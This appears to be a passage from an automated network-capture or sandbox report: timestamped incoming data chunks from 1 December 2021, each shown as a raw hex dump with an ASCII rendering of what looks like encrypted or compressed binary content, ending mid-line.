2021-12-01 18:26:22 UTC	185	IN	Data Raw: 59 ba 85 f8 2b 7b 91 ca 53 9d b5 8c f1 e5 55 48 ad 67 c9 28 22 6e 62 24 25 26 a8 3c ba 91 c4 68 ba 34 f0 a1 04 72 88 ff c1 04 c1 8c 5b 6a 2c e9 14 a4 35 c9 6e 2e be 0f c3 69 d3 b3 98 2a 0d fc c0 e0 56 d3 df c3 c0 dc 99 28 80 c7 e3 29 c8 6e 23 56 2f fa e2 e2 01 5f fa 14 c5 b6 bb ca 5f d8 f2 2f 6c a3 ba f6 a9 19 09 99 2b 7a 66 e6 4f c1 84 c5 51 60 bb 58 1d a1 29 84 7b 2f e7 fa aa d0 cf 7c a9 76 df 05 dd 9b b9 55 d2 dc 5b 48 43 07 5b 8a 24 f8 06 25 55 94 bc cf 07 af 6f d3 ac 8f 9a 42 99 60 33 e2 c0 eb 68 cf 08 56 34 31 3d 40 32 d0 49 60 22 ab 61 e2 75 56 b2 7f 95 b6 ad 6d f1 d3 bc 21 98 cf c2 0c 97 98 aa 1d 20 96 51 44 d0 c2 a4 3d 18 34 50 5d be 9d f8 25 af 63 5d 44 c2 f0 f8 19 c1 f4 0a 8a bb 18 7a fd 63 34 f4 5f fa 6a af 8d af bd 9a f0 3a 05 6f 68 5c 61 c1 Data Ascii: Y+{SUHg("nb$%&<h4r[j,5n.i*V()n#V/__/l+zfOQ`X){/\|vU[HC[$%UoB`3hV41=@2I`"auVm! QD=4P]%c]Dzc4_j:oh\a
2021-12-01 18:26:22 UTC	186	IN	Data Raw: 35 a9 f2 b8 93 38 a5 bb 34 78 88 ee 47 0c 7c 45 2d 3a e5 40 27 74 ba 09 9a e0 b9 47 af 12 57 99 1c a5 46 bb 0e a5 8d 5c 6e df 37 dd cf 00 1c 45 ba 04 21 00 cc ac 40 16 11 5d 90 cc d1 1e 2b 9e b1 48 b0 ce f0 33 d7 7a c5 39 22 69 41 9f 6b 14 b7 49 43 22 86 62 c2 5f 00 af 28 3b 58 87 4d da 1d 4f 29 fa 32 1b 62 e8 43 c7 9d c4 52 7c 44 0b 50 8e 42 20 7e d0 b5 c1 5e 79 94 63 dc 63 c4 92 71 53 c0 2f c2 9e 13 cb 8c 22 6a 01 33 90 88 8e 5a 37 d3 76 7c 99 9e 83 f7 54 4c 07 f6 21 bd d5 eb c0 62 bc e7 db ca 3d f6 c5 f0 43 9d b1 c1 0d 8e 65 23 85 d5 5c 9e 7f ed 35 bf a9 e5 f5 70 af a6 49 c5 29 ab ff c7 a3 f3 9e c1 79 28 96 b9 53 19 d0 a4 8e 78 df a9 41 b2 ad 7e 67 a0 6c 87 81 8d 04 51 38 61 8a 0c d4 46 f9 cf a3 d0 64 b7 5d 18 9a e6 cd 0e 91 ca 78 4f 31 6f 34 1a 7d b8 Data Ascii: 584xG\|E-:@'tGWF\n7E!@]+H3z9"iAkIC"b_(;XMO)2bCR\|DPB ~^yccqS/"j3Z7v\|TL!b=Ce#\5pI)y(SxA~glQ8aFd]xO1o4}
2021-12-01 18:26:22 UTC	187	IN	Data Raw: 2b 01 68 55 eb b1 fc b4 63 e0 c6 7a 91 55 5e c7 88 d9 17 36 81 7c 34 e0 c6 63 1f c4 79 3a cb 6c 58 97 f9 27 ad b3 3b 82 2b ac 20 67 37 22 17 1f cc d6 8d b9 5a 94 14 ef 84 11 7b 6f 25 41 92 21 32 c8 ee 0f 14 9c 15 17 0a 86 d2 74 7a 67 eb 07 87 e8 c4 c0 de f0 21 22 bc ba a3 1f 5b fa 71 ca 25 6f da cb df 06 2c c4 49 1e 34 85 4f 37 25 8b de 48 fb 9f b1 62 35 45 13 4c 14 2f f4 9b 4c 53 86 04 e7 23 9e 75 69 8b fa f8 fe 20 1e 42 64 65 3e ed 9d 71 7e 4d ea e0 89 03 ff 2f f9 cc 71 05 80 61 7d 21 66 76 52 ac fe 46 eb e6 e4 3b 6f c3 fd 43 df c4 ae a7 7e 5e 09 fa d1 09 d4 aa af 3b 1f 78 12 0c c6 5c 02 7f 7b 6e 2d 16 c3 d5 44 07 b5 f8 d4 26 22 c8 e9 17 7a e4 e7 43 9d 48 e5 84 ee e7 07 2a 1f e2 1d d8 25 5b d9 48 eb 24 fd e6 09 ea 61 02 c9 a7 ee ec 24 c1 e7 ad 17 d6 9f Data Ascii: +hUczU^6\|4cy:lX';+ g7"Z{o%A!2tzg!"[q%o,I4O7%Hb5EL/LS#ui Bde>q~M/qa}!fvRF;oC~^;x\{n-D&"zCH*%[H$a$
2021-12-01 18:26:22 UTC	189	IN	Data Raw: f6 ba d6 f2 50 9f 33 f5 8e 1d 01 c0 c4 cc a7 a6 92 f3 5a c9 36 5a 2a 4b dd fa f4 30 b7 ae 1b 6c 5b 4c 7b c7 ed aa a4 57 0f 4c 98 df 56 3d 39 86 94 bd c2 a6 a2 bc 62 d9 b2 32 37 54 9a da 52 ec 54 72 40 85 63 7c c5 1e c8 b6 51 9f e9 01 57 32 a1 fc a2 b1 1f ce 4e 67 99 c1 79 a3 03 28 ca 54 b8 ca f4 01 5e d4 86 99 e6 af 05 49 fc dd 2b a4 a8 ef 12 da 15 30 55 71 5a a9 8e e6 2f 4f cf c0 f6 4e 12 2e 76 b1 b5 d3 36 7c 44 3e 88 15 1c 9d b0 59 65 bd 48 50 70 a4 55 8d d1 ab ae 94 ae 03 3e f7 8f c4 f6 da 1c f0 2a a2 58 8d 9d 9b cf 61 19 28 80 f3 2c b7 8f ae f7 7b d8 1a 6f 4d 50 cd 64 14 77 76 cd 50 10 d8 26 5c 60 e2 48 e3 e4 f1 4a 6f 8f e4 cd 20 d2 01 b1 b6 85 30 35 91 86 47 d6 5b f9 70 c7 24 88 4b f0 e1 e5 1f 75 44 e3 50 27 d0 53 d0 ce 4b 9b 1e 5c ca e8 c4 b3 92 20 Data Ascii: P3Z6ZK0l[L{WLV=9b27TRTr@c\|QW2Ngy(T^I+0UqZ/ON.v6\|D>YeHPpU>Xa(,{oMPdwvP&\`HJo 05G[p$KuDP'SK\
2021-12-01 18:26:22 UTC	190	IN	Data Raw: ff a5 45 30 fe 87 b0 28 1f 2e a5 9c a0 25 34 5d ce 97 d4 b6 6e bb 92 19 4b b0 c8 b3 5f 05 60 a7 0e 9e 45 d6 2d 23 67 30 48 33 40 71 92 1a 56 96 92 2d f6 06 96 a0 cd e1 36 19 ac ec 89 7a 83 95 b2 6d 2a cc cc e6 75 5a 30 d5 58 a9 67 4e 81 60 c1 91 5d 40 25 5c c5 9f 9c ab 47 34 37 b3 99 1f 8c f7 ad f6 c9 9a 74 1f 58 52 9f cc f7 8c 67 0e 1a dd 67 96 b5 89 a8 3c 6b 1a 81 e7 f6 b7 e3 a3 8d e1 cc 07 2e 15 8b 1e b7 9c c5 ee c8 af 6e 97 5c 96 74 bf d7 96 58 08 67 ac 68 9d a3 71 64 cb 10 67 97 6e 51 35 44 83 3a a7 21 62 5a 63 be 16 17 ff 15 6e f4 21 81 d0 1a a4 0e a8 71 61 5a 5d 5e e9 01 fd f4 1f 16 0f 82 19 be 71 e4 5c d4 57 ea ab 99 ed e6 10 13 79 c8 c6 6d b4 59 f9 5f 73 83 0e 2d 77 fb de 3f 03 9e af e5 37 5e b5 7a 9d 21 61 be cb f2 6c e2 9d 85 e8 ea 80 0c ce 32 Data Ascii: E0(.%4]nK_`E-#g0H3@qV-6zm*uZ0XgN`]@%\G47tXRgg<k.n\tXghqdgnQ5D:!bZcn!qaZ]^q\WymY_s-w?7^z!al2
2021-12-01 18:26:22 UTC	191	IN	Data Raw: 1f 7e b7 b1 b3 cb a8 d3 81 90 3a a3 34 81 09 3d 90 b9 13 ee bb d3 4f 20 05 c1 93 70 f8 0f 20 ea 4e a9 5f 44 74 8b e7 2f 5b 54 06 f8 4e 74 2e 76 b1 d3 93 94 19 c9 02 76 ea 91 38 36 69 8e 9a ee 24 fb 62 4b 0f dc 8c 41 35 a8 ab ab dd 83 1c 82 b4 7b ac 71 6b cb 61 b4 15 bb 72 56 91 2f 9c ca a7 9b 70 e4 24 00 b5 ff 9a 9f 16 8c c0 ae 89 32 db d8 63 4f d6 b8 e3 c5 a6 9d 39 80 d7 7d 43 c3 20 b8 f6 98 81 c8 f8 b0 1c 21 bc d0 d0 ed be 8c cc 8e c0 38 09 00 74 cf 67 5d e0 73 52 c1 26 bb 43 57 da d9 a5 e7 39 97 f1 61 df 40 59 24 73 f4 65 f0 d1 14 50 d0 6f e8 1a 22 6f 6b 80 17 36 4a b2 40 85 58 48 4a 10 10 72 90 73 5e 75 27 e2 88 50 39 e0 7e 29 7f 53 0e 02 62 c4 d8 01 c7 99 e9 61 89 15 3d 3a 1d ae 69 32 5c 45 1f c3 fa bb 91 45 cb 84 7c f8 69 31 00 54 9f 5f 9b c8 91 2c Data Ascii: ~:4=O p N_Dt/[TNt.vv86i$bKA5{qkarV/p$2cO9}C !8tg]sR&CW9a@Y$sePo"ok6J@XHJrs^u'P9~)Sba=:i2\EE\|i1T_,
2021-12-01 18:26:22 UTC	192	IN	Data Raw: b9 8e 7f 55 7b 46 5c 8f a1 d4 46 0c 6e d9 b7 c9 7b 84 65 7e 4c 7c f4 e4 30 61 0e 1a d9 74 19 b9 7d 05 78 d6 30 fe 77 df 1e df 24 45 6b 46 cb 89 96 ac db a2 8c 41 3c 7b b8 4c 22 97 46 a1 0b a2 9f 19 e8 72 7f 42 06 7d 04 95 cd a1 e3 e1 9b f7 b8 00 42 b1 a8 cc d4 6c a8 bf c3 4e 81 ec 85 99 0d f8 47 1f e9 84 a9 70 61 5b 25 56 44 01 d0 92 a5 55 d4 8d e7 a2 82 4d 6c 48 33 a2 28 71 56 a2 f6 d1 91 75 c9 28 a3 58 11 14 19 8b 57 af a0 0f cb af f8 2f 2a 42 69 32 cb 8d 9d 21 2d 48 33 47 2d e2 74 50 eb 00 1b 17 8b 6b 05 df 32 84 9b 88 cd df 0e 7a 02 d9 ce 76 e3 b2 61 aa 45 e3 24 49 e2 72 45 a5 56 76 e9 34 66 91 c2 50 93 b0 0e cf 71 c0 60 6d 6c c7 28 34 43 3e 20 15 ae 6f 23 9d 25 f6 ae 8f c5 5f 61 ef 40 0e bb 2a d8 59 34 45 12 98 62 43 dc 76 f7 63 97 91 ec 1d b3 b7 14 Data Ascii: U{F\Fn{e~L\|0at}x0w$EkFA<{L"FrB}BlNGpa[%VDUMlH3(qVu(XW/Bi2!-H3G-tPk2zvaE$IrEVv4fPq`ml(4C> o#%_a@Y4EbCvc
2021-12-01 18:26:22 UTC	194	IN	Data Raw: 44 9d 3d 01 24 a5 13 0e 0a 5d 6e b5 98 76 62 ed bb fe 2b 2c 2b cc a6 9d 37 6e 40 54 83 ec 3a 62 16 ad af e6 4b 51 7a b2 26 e1 94 df a7 02 c2 74 58 9d 1e 6c 2d e8 d6 e0 e9 fa 0d 28 03 0e b5 5f 4c 11 fe bb 6e 1f ae 7f fe 32 d6 c0 45 af 2f 8f 9b ee 5a 81 f0 37 a5 99 51 2e f4 65 04 38 d3 47 39 ad 23 e3 7f 3f 00 bc 70 f3 b2 be b8 3f ed af cb db 10 8d 97 04 33 ae a9 96 13 01 b4 a1 08 28 30 80 2a 81 ce 3b 7f 7d 76 99 d0 b6 d4 23 eb a1 0f f7 69 4e 48 ad 79 8d 78 70 b3 00 ac bc 28 e8 93 db cd d1 48 48 6c 45 41 69 8e 5e a8 d1 57 fe eb 51 37 09 3c 2b 9b 88 ed ce 6e 4a e4 a0 7e 43 04 81 d8 3a 09 96 ad 20 ba 4d 02 3e 58 2f fa ae 12 b9 a1 ce b0 a6 58 d0 74 a4 a3 00 0a 93 df 24 7d 6d 96 e3 ab a0 61 2f b4 4b 1f c0 e8 12 84 28 d1 78 8c 55 e1 68 2f ab 7c 4a 5e 7b bc 91 33 Data Ascii: D=$]nvb+,+7n@T:bKQz&tXl-(_Ln2E/Z7Q.e8G9#?p?3(0*;}v#iNHyxp(HHlEAi^WQ7<+nJ~C: M>X/Xt$}ma/K(xUh/\|J^{3
2021-12-01 18:26:22 UTC	195	IN	Data Raw: 14 19 a4 7f 4e dc ac 75 db 5d 66 f0 19 3d 1b e5 ba 23 b1 7d 2d 29 e6 64 29 e3 5a 34 da c1 da 79 77 06 dd ac 21 df 3b 51 f3 b6 1b 73 20 92 35 08 22 e0 d3 36 d4 db 4a 96 c0 a3 bd 6e 0c 4b 4d ec 9a 6d 2e bc a3 5c ef a4 33 9e e2 2e 3b 47 43 cc 9e 32 82 f9 2e 65 99 f6 09 4f 5f 97 cc 4b 96 01 e8 10 49 95 38 26 7f a8 66 af 48 c8 29 db 36 97 32 2c 43 25 ca ec cb 08 35 cf 8d 67 ca cc 94 6f 16 1b b2 f8 5b 80 ad 12 30 e2 45 e1 80 da 87 4e ac d3 f5 18 99 3b 4b f3 96 70 64 1e 2b da d8 9d b0 b9 a1 22 52 16 ce f8 f9 6d 4a 41 49 01 5c ce 60 fa 61 6e 82 8b 61 11 36 d1 ad b2 c3 4c 8f 76 21 e9 ae 26 6d 00 9c 95 74 3c 6f 0d 6e 45 a0 2b 2f de 17 33 55 e4 6e 1e 47 d3 4e 44 4f 89 47 f3 e6 51 fb 0c 05 80 f1 2f ec 36 4e 0b 4b 0b 41 36 65 12 7b 6f 00 93 5c 20 a9 8d 5e df dc 86 a8 Data Ascii: Nu]f=#}-)d)Z4yw!;Qs 5"6JnKMm.\3.;GC2.eO_KI8&fH)62,C%5go[0EN;Kpd+"RmJAI\`ana6Lv!&mt<onE+/3UnGNDOGQ/6NKA6e{o\ ^
2021-12-01 18:26:22 UTC	196	IN	Data Raw: 63 de 16 52 e5 f4 7d f0 b8 d5 c6 71 6f e8 27 da bc eb 4c 4f ae 0a be e8 3f 56 88 18 29 66 4b 6e 73 d3 7a e7 a9 63 9e b0 a5 ac ea 34 d5 49 c0 41 81 78 f5 7a 96 c2 54 8c 24 a5 a0 b2 53 72 42 a2 cc 81 49 b8 fa dd 99 40 ab 5a a1 d2 43 4d ce bc 44 bc 6a 5c 5a 5b 51 28 13 23 23 9c bd 7b 86 27 96 c2 d1 e8 2e 7e 79 2b ea 99 17 c5 43 dd 6a 12 09 c4 af 63 bd 3f 9b 68 d2 88 a7 3f 55 33 34 17 8f fc 31 6b 68 65 45 e5 bc 13 96 16 9a d7 84 44 ea 30 e9 02 c4 5b 86 6c 26 4d 61 a2 63 e4 56 6a 50 0c 2f 4b 61 11 93 74 ef f5 eb 98 c6 14 ba 17 23 14 29 7c 81 eb 2b 76 62 3e b3 31 34 a2 82 fb 8e 61 2a c6 e5 5b a9 c8 24 53 06 77 f3 61 9d 1a 31 a8 38 ed 77 c2 cb 5b 74 d5 a9 e8 ab ee f5 90 4f 2b 1b 95 ad 33 bb b4 72 05 b3 7d 1b 37 59 4d 75 50 41 d4 1c c8 fe 72 a3 f4 c4 81 63 1b 94 Data Ascii: cR}qo'LO?V)fKnszc4IAxzT$SrBI@ZCMDj\Z[Q(##{'.~y+Cjc?h?U341kheED0[l&MacVjP/Kat#)\|+vb>14a*[$Swa18w[tO+3r}7YMuPArc
2021-12-01 18:26:22 UTC	197	IN	Data Raw: 0d 1b ff 1b 73 61 fe ba fa 49 47 fd f2 cc a4 9c 02 7f a8 7a af 4d 70 21 61 bd b2 c0 ef 81 a9 1f cc 49 f7 64 c8 94 a4 23 43 6f ae 06 e3 f5 13 a9 fc cb b3 6f 9c 7e e1 88 ba 3f 4e 84 61 79 7d 69 fc d5 f3 97 fa f8 4f e5 de d8 90 b0 b3 a6 d0 50 92 0a e6 b1 72 70 f9 ce 08 95 3d 50 fa 45 5e 89 33 61 29 36 6e 32 f4 82 f4 87 76 2b e6 3c 88 64 bf 8d dc 32 7d 6d 8b 85 0c af 63 77 19 93 36 53 92 00 1e 48 99 f9 82 c7 0d 66 3f 1d e9 f3 14 05 17 6a 59 49 d1 38 96 0c 97 64 3e e1 47 19 fb da c9 54 a8 92 c5 da 32 64 8e e8 0f c1 94 a1 18 d2 f9 4b 11 c4 00 3a 63 fb ae f2 f2 14 11 31 01 6f f5 75 83 65 f0 6e cc b6 ac 35 dc 2b fb c2 38 1f 5d 52 c9 8c e8 47 2a f1 4d 80 4e 01 0b c7 44 62 da 96 b0 d8 26 e6 f1 30 4d 1a f9 18 34 ad 1d d4 f1 bb bd 74 9e 90 c8 13 a7 1b c0 75 52 53 37 Data Ascii: saIGzMp!aId#Coo~?Nay}iOPrp=PE^3a)6n2v+<d2}mcw6SHf?jYI8d>GT2dK:c1ouen5+8]RG*MNDb&0M4tuRS7
2021-12-01 18:26:22 UTC	199	IN	Data Raw: 53 61 60 a8 d1 91 9a 49 ff da ed 33 2c bc d1 f2 b0 82 00 aa df 33 3f 49 af 74 34 10 cb eb db c3 75 1b 24 12 09 a8 9d 1d 8d 1e b1 c5 34 74 b0 93 5e 6e e5 19 d0 e8 01 e1 19 15 85 2b 30 e7 ea 40 10 57 d6 2d 73 c9 a4 e5 ec 42 68 ea c7 3a e0 15 88 cf ed e5 f7 be 59 31 64 cc 56 4e d4 1f 29 05 18 6b bc 56 4a 65 80 3f 33 ab 63 54 15 98 97 23 3f 72 a1 51 9f b4 2e 8d c4 c1 8c 49 de 8a d8 e4 78 cc 2f 64 aa ce a3 4c 3d b7 37 be 08 87 e0 39 52 66 b6 72 31 68 58 2f fb eb 76 1b 11 26 07 00 7e 28 ea 93 f2 c6 a1 6f 93 ac 1b 8b 2d 5c 45 9b e7 c9 68 f7 e5 a4 50 ed 23 ac 9b 0f ea 94 47 46 58 fa e7 4f fc 50 40 65 7d fe ac 83 1e ef 62 b7 ab 6d 2c 71 f2 07 2c df ff 0d b9 9b f7 f7 7b 84 19 0f 62 46 f2 c3 f4 0e 02 9d 02 16 f2 ea 2c aa 01 64 71 88 27 1c 59 50 a0 52 ab c8 e3 47 f7 Data Ascii: Sa`I3,3?It4u$4t^n+0@W-sBh:Y1dVN)kVJe?3cT#?rQ.Ix/dL=79Rfr1hX/v&~(o-\EhP#GFXOP@e}bm,q,{bF,dq'YPRG
2021-12-01 18:26:22 UTC	199	IN	Data Raw: d1 b9 69 d7 e0 dc 38 c1 2e 3f c2 57 63 21 93 6c 28 db 0b 67 ef f6 42 12 a7 60 ab 41 b3 fc 61 5f 92 9c e1 fd 68 65 24 5f d0 31 f3 15 87 f7 c7 25 8c bc 50 e1 23 95 3c 56 06 c9 0c c5 08 4f b9 f6 d0 a8 43 0a c4 90 fe b2 fd 70 e8 8f ea 7b dd 7b 4f 19 8c 29 32 89 22 7d 70 90 45 9d 84 7c 2c 6a 31 00 54 9b 61 f4 c2 dc d3 40 66 fc dd 53 eb d9 42 36 18 c4 8a ef a5 d1 67 7f 4c 4d 81 c1 8f ec ea 4d 96 a0 f2 07 ed 95 2c 2c d9 63 c8 ae 8e 48 64 6d 57 44 c3 32 dc db 08 7b ed 6e 6c 20 d3 ad fa c9 3b c3 d4 ac 74 92 0e 94 8a e9 a6 9c cb 4f 6b a9 aa 1e 82 df 1b f6 42 54 dd 48 85 3b bc 69 21 73 16 cb c3 99 f4 fe 66 39 67 20 22 59 6d 21 2f e3 7e 64 eb a8 67 1a 3d dd cd f0 96 88 18 23 c0 2c ac 0b ff b4 70 65 99 c5 33 2f 44 31 11 df f7 4d cb ad 55 08 2b a3 d2 48 3b 3f b4 3d 05 Data Ascii: i8.?Wc!l(gB`Aa_he$_1%P#<VOCp{{O)2"}pE\|,j1Ta@fSB6gLMM,,cHdmWD2{nl ;tOkBTH;i!sf9g "Ym!/~dg=#,pe3/D1MU+H;?=
2021-12-01 18:26:22 UTC	201	IN	Data Raw: b3 1c 16 28 cf 71 4e 64 a7 5a 2d 61 b0 1e ff 16 15 9b 92 34 97 43 fe 53 fa 88 46 13 8d 9e fa b0 2d 5d 1c 4d c2 a5 bb e1 4e 8a bc f7 78 80 17 f3 a2 4d 34 7d 8d 0c b6 99 2a 56 ee 99 08 ad 7c c5 28 f7 23 a8 dc f6 57 ec d1 b6 79 6e c5 3f fc 0b 03 dc 00 70 46 ee 83 0a 14 f7 97 ed d2 5f d4 b1 62 cb eb 91 13 cd 67 20 f8 d0 5a f3 36 fe 63 34 fd 9d de bd b4 a7 09 15 7b c9 a0 19 db 95 7d b5 a8 7d 8c b4 cf 11 32 35 cd 6d 7d a6 bc 2f a2 f1 ea c6 9a 3c a1 f1 1d df ed 52 cb 80 e8 b3 a0 e0 77 5e b8 77 5a cd dd 40 21 2b 8b cf f1 e1 93 86 e3 9f 01 2a 66 b8 73 5f b3 5f 13 77 19 66 79 53 71 e5 82 ee 88 ce fb e8 53 f2 93 56 83 4e e5 ad db 44 a1 93 21 42 85 88 c3 98 d0 1f 64 b5 cb 1e 53 e8 ac f3 5a a6 cb 8e 2e d6 b7 ed f5 4a 99 3b 89 f4 8c f7 4b d2 a7 15 14 c4 5a de 1a d6 05 Data Ascii: (qNdZ-a4CSF-]MNxM4}V\|(#Wyn?pF_bg Z6c4{}}25m}/<Rw^wZ@!+fs__wfySqSVND!BdSZ.J;KZ
2021-12-01 18:26:22 UTC	202	IN	Data Raw: 09 31 38 71 7b c0 a1 6b 96 f9 d2 02 41 3e 36 6d 1f fa 9d 69 7e e2 a8 dd c8 c4 26 be 0f 22 3c 24 6f 92 5c 4c 3b 78 98 5a d3 df be 15 a3 28 5f 28 90 9f 17 3f ed 4a 58 c5 cd 57 a2 e9 91 1b 6f 0f 77 c6 2f 20 69 85 87 2c df 24 01 c3 8a 97 80 e3 cb e5 e2 f6 fc 75 68 d2 36 d7 dc 29 a9 43 c8 68 d0 95 36 ac 03 98 bc 6e 47 60 a7 33 9a cd 61 40 77 aa d4 22 9a ab f8 ec 79 be 46 70 6b 82 d0 84 e9 20 1e af 6b 8a c5 c8 9f 5e 4b b2 6d 29 46 bd ed 9e 74 94 97 cc c5 f9 53 63 20 19 a5 4f 13 4a b2 50 cd 2f 38 93 de c1 32 7f 5a a7 fb 01 35 34 5c ad 6e 35 6e 6e b3 1a 4e 34 b5 97 f1 9c 68 07 da c5 fe ef b9 05 93 fc e9 90 62 86 34 44 f5 37 d5 1e c9 b2 04 07 e3 47 7c 03 42 65 7d 20 12 f2 6d f9 f4 3e 55 f3 ab 07 3a 46 6b 69 82 5c 84 60 ae c7 66 5d 90 c4 9a 30 a7 3d 0b 59 d5 50 4f Data Ascii: 18q{kA>6mi~&"<$o\L;xZ(_(?JXWow/ i,$uh6)Ch6nG`3a@w"yFpk k^Km)FtSc OJP/82Z54\n5nnN4hb4D7G\|Be} m>U:Fki\`f]0=YPO
2021-12-01 18:26:22 UTC	203	IN	Data Raw: 60 63 56 d2 e9 f0 2c 16 da ef 61 78 a3 e3 c4 7b 4d 30 70 10 d0 ce 5b 9a 35 3b ac cf 91 a2 6c 60 54 88 05 a0 93 ab 14 85 c2 09 bd fc 7f 8c b4 e7 0c 51 4e 74 f6 42 b6 ce 61 27 d6 2a d6 f2 07 5a f1 15 31 72 fe 07 c4 9c f1 0f 0a 6a cc 89 36 0a 63 36 63 47 0b 8d 3f 36 a1 48 77 12 cc d1 2c 42 cb a0 90 0c 4b 61 a8 5c 61 bc 56 55 93 73 bd 58 c8 df 90 fc 0f d3 8d 08 87 ad b0 d8 44 7c 20 10 5a 7d bd e7 07 97 ff e1 a6 bf b6 3a e0 0f 6b 1b 66 18 ef 62 e1 0a 3b 28 b8 b5 58 34 27 a0 ea 3c 13 66 a7 24 56 83 6d b2 aa 64 a0 57 a6 5a 00 38 cc 2d b2 cd f7 45 b7 e6 d9 1d df d6 54 09 5a ef 02 b9 22 f1 82 59 49 1d 4c 23 25 94 92 30 50 db 26 8e c7 80 92 54 e8 35 55 e2 9c e6 0c c9 21 2c 66 f2 a1 d6 2d 49 39 01 38 c9 85 f7 45 09 47 d4 9b fd a1 7c ac f6 a0 b8 55 cf ee 5a 60 75 0d Data Ascii: `cV,ax{M0p[5;l`TQNtBa'*Z1rj6c6cG?6Hw,BKa\aVUsXD\| Z}:kfb;(X4'<f$VmdWZ8-ETZ"YIL#%0P&T5U!,f-I98EG\|UZ`u
2021-12-01 18:26:22 UTC	205	IN	Data Raw: 84 24 8e eb e1 a7 e5 2d 8e 79 97 2f 6a 34 86 ff c8 31 2f 23 b4 e5 d1 cb 51 c6 65 66 54 2b f5 18 31 d3 56 4a 4f 91 50 21 43 67 e4 6a 67 1a 6e e1 98 d2 f2 61 23 a3 c0 2c 39 34 80 2d 8a 24 26 f7 72 d0 ba 2c 7e 47 e2 25 64 db 0b 0c 2b a3 62 4a 3b 3f b4 89 a4 3c 3e 40 30 b5 cb 59 89 f3 09 d3 6b 97 8c a1 c8 b4 97 91 0a b2 c0 da ba 22 62 ed cd 1e c8 e1 7a 4d 97 88 13 c4 e5 42 3c 9b f4 d4 55 d2 10 6b 4d 82 17 3c 77 87 80 cc 21 46 b3 d6 c2 23 46 bb 16 64 c4 72 1e 7b dc dc e0 f6 44 55 a0 ce fd 76 82 dc 74 94 64 62 99 d4 de a9 93 8a c3 b1 c4 eb a7 b3 50 4a 3f dd cc e1 ca b3 8f af d4 65 3d 21 b7 af 0f c3 c6 8a 1d c5 10 6d f2 ce 08 9d b4 70 40 f7 79 fa 10 64 b4 69 2d 45 d9 5f 01 53 c5 9f 78 51 eb 7c e5 74 8b a3 d7 6a 9e 90 84 5f 5a a8 85 28 a4 ab 2e d0 16 80 bd 78 4a Data Ascii: $-y/j41/#QefT+1VJOP!Cgjgna#,94-$&r,~G%d+bJ;?<>@0Yk"bzMB<UkM<w!F#Fdr{DUvtdbPJ?e=!mp@ydi-E_SxQ\|tj_Z(.xJ
2021-12-01 18:26:22 UTC	206	IN	Data Raw: 5b bc 77 5b c5 d1 b4 10 ca 5f bd f8 57 5f 47 20 6a a3 46 eb cc e8 aa 3c 3b 03 3f 8a df 46 3c af bd 70 83 4c f8 8e 95 01 30 5f e6 cb fa d1 49 1f 2d 03 c9 87 f7 d5 5e b1 f3 5b 24 d9 3b 41 02 a7 3c 30 f6 43 df 1e 8a 7e 00 8a 7b 26 8b 92 01 d4 f1 a4 6c 64 74 21 4a 24 2c 58 e8 36 60 b0 10 1b e9 80 4c 56 eb df 59 af 83 81 c3 13 2a 88 75 75 25 76 98 59 91 8a 0c d7 b2 f9 8d eb d0 64 b7 5d 19 66 22 c2 46 9c ca 0c 89 99 a3 a5 39 d5 5d 84 20 50 10 bd d3 21 95 32 82 50 a4 cb 70 ec f8 bb 29 08 35 eb 44 29 f0 9e 12 06 af 62 07 aa 2b 21 e2 48 eb f0 bd c1 e3 62 fd c3 20 3a a2 63 4d f7 25 40 8d 02 ff f8 35 ee 86 42 69 6c 28 07 c2 af 06 09 57 7e 92 66 e8 4a 15 9e a3 28 d8 5b be 93 61 7b 6a 46 54 3a 66 da 63 8b c8 2d 70 eb f8 31 20 93 82 23 fc c4 80 8f 5f e9 1b 27 73 e4 bb Data Ascii: [w[_W_G jF<;?F<pL0_I-^[$;A<0C~{&ldt!J$,X6`LVY*uu%vYd]f"F9] P!2Pp)5D)b+!Hb :cM%@5Bil(W~fJ([a{jFT:fc-p1 #_'s
2021-12-01 18:26:22 UTC	207	IN	Data Raw: 31 b7 04 42 76 73 f9 dc 96 59 99 aa 43 4f cd b0 a4 68 ce 05 c5 ab 76 fc bd 9d e9 35 b1 30 ac dd 4a ae 26 17 6c c7 e9 94 d9 47 d0 30 a2 c2 54 57 c7 b5 7d 77 ed be c8 5e 91 b8 68 e6 6f 75 48 86 f3 72 21 95 4e 64 ae f1 a6 99 41 09 df 56 76 f0 8e 01 9b ef b0 4a 49 de e7 a9 01 fc 78 f0 8e eb 66 6f 50 5a 32 8d e1 47 08 de 1f 7b 8f 78 ed 84 ee 82 2c 36 0f e2 69 cd a4 53 66 87 9d 9c a5 7f 54 c7 d5 12 01 e0 6f e4 91 0a 48 ba d3 c5 75 37 a8 6c 22 33 7a 9e 31 ea 91 ce bc 5d c8 c7 57 f1 f8 0b b4 3e a2 94 21 64 95 e3 b0 81 bb 72 fd 3a 98 0c e1 25 ee 7d d7 8e bc fa 37 90 91 4c 36 3f 67 98 8c 1e 48 74 22 39 2b bd 2e d7 b4 6e 2a 13 c7 af 73 84 88 71 d6 f9 db d7 68 1e 24 6e 2b 15 70 66 a0 6b 44 9d c7 7f c9 22 9d 97 0f 7a 02 b1 3e 5e 99 8d b7 f9 ae 8d 79 7e 4c 60 d6 0f a9 Data Ascii: 1BvsYCOhv50J&lG0TW}w^houHr!NdAVvJIxfoPZ2G{x,6iSfToHu7l"3z1]W>!dr:%}7L6?gHt"9+.n*sqh$n+pfkD"z>^y~L`
2021-12-01 18:26:22 UTC	208	IN	Data Raw: a9 8a b9 a7 2e c7 c2 83 3f 18 ba c6 2f 5b 89 a0 25 ce 0c 7f c8 4e 0d 21 75 15 a4 9b 89 4a 42 2e 13 42 cf c9 fd 5a 9a e7 9f e7 d0 07 e8 9d ae 1f ee 78 6b ac 31 c3 65 f2 a3 df ed 8d 18 d8 cf 61 bd 75 09 1f af 68 40 70 24 10 a8 1c 57 99 44 27 97 65 89 89 73 54 9c 6f c2 d4 3d 2e 93 2b 91 3e 79 c0 98 74 5e 48 2d 01 3e e1 58 9d 1a b1 2d e8 de 51 05 f4 5c 60 75 3f c7 b0 70 70 cb bb 86 f0 3a 38 c1 80 43 ce 54 ae 5b be 48 a1 d6 5a c8 86 5d 66 ae a3 fa 48 f3 44 eb 57 37 e8 27 97 c5 c8 6b 80 17 e6 49 b2 40 5d 96 01 11 63 23 56 3a 79 80 8e 55 da 8f b9 27 ef 14 2b 73 10 b7 1c 33 49 c5 26 39 59 df 00 e5 72 d7 dd e5 20 81 ca 26 b9 79 cf b9 04 98 ce be 97 80 8b 1e 70 00 56 cf 80 25 bb 10 9e 1e 71 6e 4b de 55 54 04 f8 18 a1 96 9a 